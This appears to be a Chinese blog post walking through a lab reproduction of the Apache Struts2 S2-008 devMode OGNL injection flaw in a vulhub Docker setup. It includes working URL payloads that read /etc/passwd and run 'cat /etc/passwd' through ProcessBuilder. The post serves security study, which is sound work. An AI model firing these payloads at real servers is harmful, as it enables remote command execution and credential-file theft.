漏洞复现----30、Struts2/S2-008

已于 2022-05-30 15:43:07 修改
阅读量838 收藏
点赞数
分类专栏: # 漏洞复现 网络安全技术 文章标签: struts
于 2021-06-29 14:26:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/117567264
版权

文章目录

一、漏洞原理

S2-008官方发布了四个漏洞,第1、3、4分别是S2-007、S2-009、S2-019漏洞。本文说的第2个是CookieInterceptor拦截器缺陷,在cookie名称处注入,利用道理和S2-005差不多,Cookie 拦截器错误配置可造成 OGNL 表达式执行。但是大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,所以此漏洞无实际利用意义。

struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令:
例如在 devMode 模式下直接添加参数?debug=command&expression=,会直接执行后面的 OGNL 表达式,可以直接执行命令。

影响版本
2.1.0 - 2.3.1

二、环境启动

docker-compose build 
docker-compose up -d
访问:IP:8080
需要开启 devMode 模式

三、漏洞利用

利用一
文件读取:

/devmode.action?debug=command&expression=%28%23w%3Dnew%20java.io.File%28%22%2fetc%2fpasswd%22%29%2C%23a%3Dnew%20java.io.FileInputStream%28%23w%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read%28%23d%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23d%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%29

即为:

/devmode.action?debug=command&expression=(#w=new java.io.File("/etc/passwd"),#a=new java.io.FileInputStream(#w),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#d)),#f.getWriter().flush(),#f.getWriter().close())

利用二
命令执行:

/devmode.action?debug=command&expression=%28%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22cat%22%2C%22%2fetc%2fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B5000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%29

即为:

/devmode.action? debug=command&expression=(#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[5000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close())

参考链接:https://github.com/vulhub/

李沉肩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 724
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
s2-008远程代码执行漏洞
Stephen Wolf
11-18 1719
一、漏洞描述: S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情...
S2-008 &S2-009 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 4070
前言 漏洞环境改自vulhub https://github.com/kingkaki/Struts2-Vulenv S2-008 漏洞信息 https://cwiki.apache.org/confluence/display/WW/S2-008 主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码 第一种情况其实就是S2-007,在异常处理时的OGNL执行 第二...
[旧文系列] Struts2历史高危漏洞系列-part2:S2-007/S2-008/S2-009
mole_exp的博客
01-18 1945
文章目录关于<旧文系列>前言S2-007漏洞复现与分析可回显PoC漏洞修复S2-008漏洞复现与分析Vuln-1:Remote command execution in CookieInterceptorVuln-2:Remote command execution in DebuggingInterceptorVuln-2:可回显PoC漏洞修复S2-009漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技
s2系列——s2-007,s2-008,s2-009复现
qq_54030686的博客
03-02 3375
s2-007,s2-008,s2-009复现 简而言之就是payload的输入,具体复现这里不再复现,相关博文,也有蛮多,这里更新下脚本 s2-007 def s2007(url): try: proxy = '192.168.43.74:8080' # 本地代理 proxies = { 'http': 'http://' + proxy, 'https': 'https://' + proxy }
Apache Struts2远程代码执行漏洞(S2-009)
weixin_47493074的博客
09-27 537
Apache Struts2远程代码执行漏洞(S2-009)
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Apache Struts2远程代码执行漏洞(S2-009)复现总结
qq_45746681的博客
10-07 591
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、漏洞成因?二、复现1.环境搭建复现 前言 记录并复现下常见的struts2漏洞,加深理解 一、漏洞成因? 在修补了S2-003和S2-005之后,攻击者又发现了一种新的绕过ParametersInterceptor正则保护的攻击方式 当传入(ONGL)(1)时,会将前者视为ONGL表达式来执行,从而绕过了正则的匹配保护。而且由于其在HTTP参数值中,也可以进一步绕过字符串限制的保护 二、复现 1.环境搭建 因为墨者学院代币
buuctf [struts2]s2-009
qq_1873822的博客
03-22 368
漏洞描述 这个漏洞s2-003 s2-005 属于一套的。 Struts2s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法
墨者学院-Apache Struts2远程代码执行漏洞(S2-019)复现
JimWu的博客
09-04 1127
Apache Struts2远程代码执行漏洞(S2-019)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理:默认情况下禁用动态方法调用导致的命令执行。 1.打开靶场,搜索一下S2-019漏洞原理。 2.构造POC,执行命令ls查看文件。 进行url二次编码。 ?debug=command&expression=%23f%3D%23_memberAcces...
S2-008漏洞复现
baidu_38844729的博客
11-14 803
环境搭建 使用docker进行漏洞环境搭建,有关docker的安装和镜像部署可以参考我前面的博客 docker-compose build docker-compose up -d 漏洞利用 命令执行EXP http://localhost:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.Method...
S2-008 远程代码执行漏洞
EC_Carrot的博客
08-07 607
漏洞简介 影响版本: 2.1.0 - 2.3.1 图片出处:https://github.com/vulhub/vulhub/blob/master/struts2/s2-008/README.zh-cn.md 漏洞复现 例如在 devMode 模式下直接添加参数?debug=command&expression=<OGNL EXP>,会直接执行后面的 OGNL 表达式,因此可以直接执行命令(注意转义): http://localhost:8080/S2-008/devmode.act
Java培训 | 服务攻防之框架Struts2
weixin_45695430的博客
06-30 1261
Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与Servlet API完全脱离开,所以Struts 2可以理解为WebWork的更新产品。虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小_java培训。...
Struts2 S2-062(CVE-2021-31805)漏洞分析及复现
热门推荐
江左盟的博客
04-20 3万+
简介 2022年4月12日,Apache发布安全公告,修复了一个Apache Struts2 中的远程代码执行漏洞S2-062(CVE-2021-31805),攻击者可以利用此漏洞来控制受影响的系统。该漏洞是由于 2020 年 S2-061(CVE-2020-17530)的不完整修复造成的,当开发人员使用了 %{…} 语法进行强制OGNL解析时,仍有一些特殊的TAG属性可被二次解析,攻击者可构造恶意的OGNL表达式触发漏洞,从而实现远程代码执行。 影响范围 2.0.0 <= Apache Struts
s2-005漏洞复现
最新发布
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值